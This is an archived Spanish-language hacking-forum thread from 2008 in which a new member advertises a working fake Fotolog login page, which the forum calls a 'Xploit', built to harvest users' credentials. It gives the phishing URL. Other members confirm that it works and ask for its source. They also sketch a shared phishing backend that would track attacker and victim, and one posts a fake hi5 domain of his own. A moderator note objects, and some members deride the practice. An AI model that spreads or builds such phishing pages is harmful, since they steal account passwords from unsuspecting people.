Help - Search - Members - Calendar
Full Version: Xploit Fotolog (funcionando)
Hackerss.com > Informática > Hacking
skynet11
Bueno antes que nada quiero decirles que soy nuevo en el foro.
Me presento, Soy Damian de 20 años, vivo en Buenos Aires Argentina.

Viendo el foro, me parecio bueno podes enseñar mis conocimientos en este foro.
Uno de mis grandes conocimientos en la programación son los de crear Xploits.

Mi primer Xploit: fotolog.com.isgreat.org/enviar.php

Para todos aquellos que quieran hacerme consultas, Aqui estare.
Saludos a todos.

Un Xploit es un programa o sitio web Falso (o Fake) con el cual se intenta engañar a una persona con el fin de que entregue sus credenciales (usuario:contraseña) a quien le envia el mensaje. El uso de Xploits de terceros no se considera "hacking", ya que la persona que usa estos servicios ni siquieras sabe como funciona el sistema, solo obtiene los resultados. En el fondo, este tipo de herramientas públicas cultivan el espiritu lamer de los visitantes.
Por esta razón, en hackerss.com no apoyamos la divulgación o uso de sitios como estos.
Ironic
mmm por tratarse de xploits, lo paso a seguridad wink.gif

Saludos...

todavia no me llego el mail tongue.gif
cortero
Yo tambien lomande a mi correo y aun no ha llegado sad.gif
cortero
A pues si funciona ya me llego y si es muy real, ademas de k logra su objetivo, tendras uno de metroflog o hi5??? jajaj es broma biggrin.gif

Saludos.
Bucio
sabia que ya te habia visto en algun lugar ._.
bueno, espero que no desapegue algunas reglas ._.
--
Pues no lo eh probado ajajaj :> pero si alguno le funciono os muestre resultados ajaja
DarkAngel
Pues si funciona y llega a la bandeja de entrada, sería interesante que pusieras el código que has usado/creado =p
Alluz
Estos eran los super post de hace 4 años.... por favor, evolucionemos. Si alguien dice ser digno miembro de hackerss.com, al menos debe saber como se usa la función mail() en php, o sus variaciones en otros lenguajes.
Bucio
u,u alluz se que tienes razón pero, ... jajaj xD.. ya abuelo deja que los niños jueguen jajajja :> seria divertido que pusieras una parte del codigo aunque XD me mata de risa, por cierto no se pero sigo pensando que va algo contra las reglas... buen por mientras para que sea un buen post, estaria mejor mostrar el funcionamiento dela funcion mail(); como dice alluz, y la interacion del form, eso estaria perfecto no?...
Algunas personas del foro no tienen idea de como funciona, :>
XD juaking esa es la palabra correcta
K9999
Ves por que te digo que necesito actualizarme?, Antes los exploits eran el pan de cada dia de este foro. pero analizando un poco a profundidad, no avanzamos mucho si seguimos utilizando metodos tan viejos como este...
Bucio
uff k999, ya hasta envenamiento de dns mediante los routers ahí u,u mira:
esto es del 2006 http://www.hispasec.com/unaaldia/2818/

y ahora esto:
http://www.shellsec.net/articulo/pharming/
Garu
esos tiempos de Berna con sus preguntas de como se usa un Keyloguer, de Pardo solucionando preguntas, de Alluz, siempre puteandonos biggrin.gif, y uno que otro admin diciendo lamers.

jejej si funciona, pero en firefox como que no lo veo bien, pero para los tristes que usan hi5, caen facil biggrin.gif

snif snif, que tiempos aquellos
BeRMAnYa
perdon yo? xddd puede ser
garu qn sos vos?
Bucio
QUOTE(BeRMAnYa @ Feb 22 2008, 10:57 AM) *
perdon yo? xddd puede ser
garu qn sos vos?

Respeta alos ancianos, porfavor, U_U creele biggrin.gif
Garu
Libera el Codigo, nosostros podemos mejorarlo para hacer joda, y que los admin,0(algunos), se llenen la boca todo el dia diciendo (lamers) biggrin.gif

yo tengo uno peor no me funca muy bien xD.
K9999
Ps... si realmente le dieramos un buen uso al Xploit de Skynet11, mejoraramos el código y lo utilizaramos para algo que valiera la pena ps ya no seria tan Lammer el asunto! wink.gif
Garu
para qeu podria hacerce un Xploit xDDD

podria ser para mandar postales desde Hackerss biggrin.gif
Hacer un concurso de que Xploit es mas creible biggrin.gif

nose me ocurre nadamas, de ahi seria mas lamer que el keylogguer biggrin.gif
Ironic
podrian hacer un sistema que administre pass y eso...
de manera que uno ya tiene hecho el sistema...
y lo unico que deberia configurar son el formato de los mails, las landing pages y las direcciones de reenvio tongue.gif y ya

de manera que con el mismo sistema, pueden administrar varios Xploits... y evitarse tener que reprogramar todo... wink.gif
Garu
podria hacerce un CMS (o algo asi xD) para mandar email xD

hacer un sistema completo

www.llslslsls.com/mail.php?a=garu&v=ironic

a = atacante
v = vistima

podriamos hacer un sistema que cualquiera mande xD a cualquier persona y garantizando que a el le llegue el pass xDDD

seria bueno, pero estamos hablando palabras al aire xD, si el que jhizo el codigo no lo libera no se me ocurre nada mas xD.

saludos
Ironic
mmm garu... tampoco es tan complicado...

si el que hizo el codigo no lo libera, pues hazte uno tu!...

si lo "complicado" que hizo el, fue que el mail y la pantalla landing se vean como fotolog...

lo que yo digo, es hacer el backend...
Garu
yo tengo el mio, pero no me llega todos los correcos bandeja deseada, solo a los correos de la xtension de mi empresa llega bien, por eso seria bueno que lo libere xD.

que es un backend... xD
Victor-SB
QUOTE(Bucio @ Feb 21 2008, 07:14 PM) *
bueno, espero que no desapegue algunas reglas ._.

Esto es PHISH HOTMAIL! CIERRA-LO xDDDD
estos putos fotoslogs siempre ponen las mismas contraseñas de su correo Hotmail, para que vergas quiere uno la contraseña de admin de un fotolog? ESTO ES PHISH HOTMAIL! CIERRANLOOO xDDDD

Editado: putossss después de 4años siguen diciendo putos "xploits", son scams, spoffings, phish, fakes, como les de la gana pero cojones dejen de decir XPLOITS!! quien se invento esta jodida idea de nombra-los "xploits" ¿los hispanos? todas las webs hispanas las veo nombrar así erróneamente y no ser porque >.<
Ironic
Hice de esto un reto xD

http://foros.hackerss.com/t7559/reto-quoth...-lugar-peorquot

Esto es PHISH HOTMAIL! CIERRA-LO xDDDD
estos putos fotoslogs siempre ponen las mismas contraseñas de su correo Hotmail, para que vergas quiere uno la contraseña de admin de un fotolog? ESTO ES PHISH HOTMAIL! CIERRANLOOO xDDDD

Editado: putossss después de 4años siguen diciendo putos "xploits", son scams, spoffings, phish, fakes, como les de la gana pero cojones dejen de decir XPLOITS!! quien se invento esta jodida idea de nombra-los "xploits" ¿los hispanos? todas las webs hispanas las veo nombrar así erróneamente y no ser porque >.<

Mmmm se llama jerga...
es hispano, por como suena.. xploit suena igual que exploit (aunque no es lo mismo).
Y si despues de 4 años no te acostumbraste, tenes un problema de adaptacion tongue.gif

y si, son scams, phishing, fakes, porque no xploits? porque no es en ingles?.....
taboo
QUOTE(skynet11 @ Feb 20 2008, 12:48 PM) *
Bueno antes que nada quiero decirles que soy nuevo en el foro.
Me presento, Soy Damian de 20 años, vivo en Buenos Aires Argentina.

Viendo el foro, me parecio bueno podes enseñar mis conocimientos en este foro.
Uno de mis grandes conocimientos en la programación son los de crear Xploits.

Mi primer Xploit: fotolog.com.isgreat.org/enviar.php

Para todos aquellos que quieran hacerme consultas, Aqui estare.
Saludos a todos.

Un Xploit es un programa o sitio web Falso (o Fake) con el cual se intenta engañar a una persona con el fin de que entregue sus credenciales (usuario:contraseña) a quien le envia el mensaje. El uso de Xploits de terceros no se considera "hacking", ya que la persona que usa estos servicios ni siquieras sabe como funciona el sistema, solo obtiene los resultados. En el fondo, este tipo de herramientas públicas cultivan el espiritu lamer de los visitantes.
Por esta razón, en hackerss.com no apoyamos la divulgación o uso de sitios como estos.

hola,

donde especifico mi direccion para que me llegue la contraseña?
Ironic
yo tengo uno hecho... pero por ahora no he conseguido manera de realizar la parte de que se pueda reconocer que "usuario" envio cierta victima...

falta poco para sacarlo online =P
evilrulo
yo ya tengo uno, el problema es la direccion web, el mio es algo asi,,,http://hi5hss.oamm.info/ tongue.gif
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.